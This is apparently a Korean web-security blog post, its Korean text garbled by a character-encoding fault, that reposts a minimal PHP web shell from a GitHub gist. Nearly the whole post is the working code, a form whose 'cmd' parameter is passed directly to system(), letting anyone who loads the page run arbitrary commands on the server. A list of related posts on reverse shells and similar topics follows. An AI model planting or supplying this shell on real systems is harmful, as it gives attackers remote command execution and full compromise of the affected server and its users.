728x90
๋ฐ์ํ
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
์ถ์ฒ:
https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985
easy-simple-php-webshell.php
GitHub Gist: instantly share code, notes, and snippets.
gist.github.com
728x90
๋ฐ์ํ
'๐์ ๋ณด๋ณด์ > ์น ๋ณด์' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
์น ๋ณด์ - PHP ๋งค์ง ํด์(Magic Hashes) ์ทจ์ฝ์ (0) | 2023.05.24 |
---|---|
์น ํดํน - ๋ฆฌ๋ฒ์ค ์ ๋ช ๋ น์ด ๋ชจ์ ์ฌ์ดํธ(revshells.com) (0) | 2023.03.16 |
์น ๋ณด์ - ๋ฐ์ธ๋ ์, ๋ฆฌ๋ฒ์ค ์, ๋๋ธ ๋ฆฌ๋ฒ์ค ์ (0) | 2022.12.05 |
์น ๋ณด์ - IP ๊ธฐ๋ฐ ๊ฒ์ฆ ๋๊ตฌ(criminalip) (0) | 2022.10.06 |
์น ๋ณด์ - ํ์ดํฌ์ค์ฟผํ (Typosquatting) (0) | 2022.10.06 |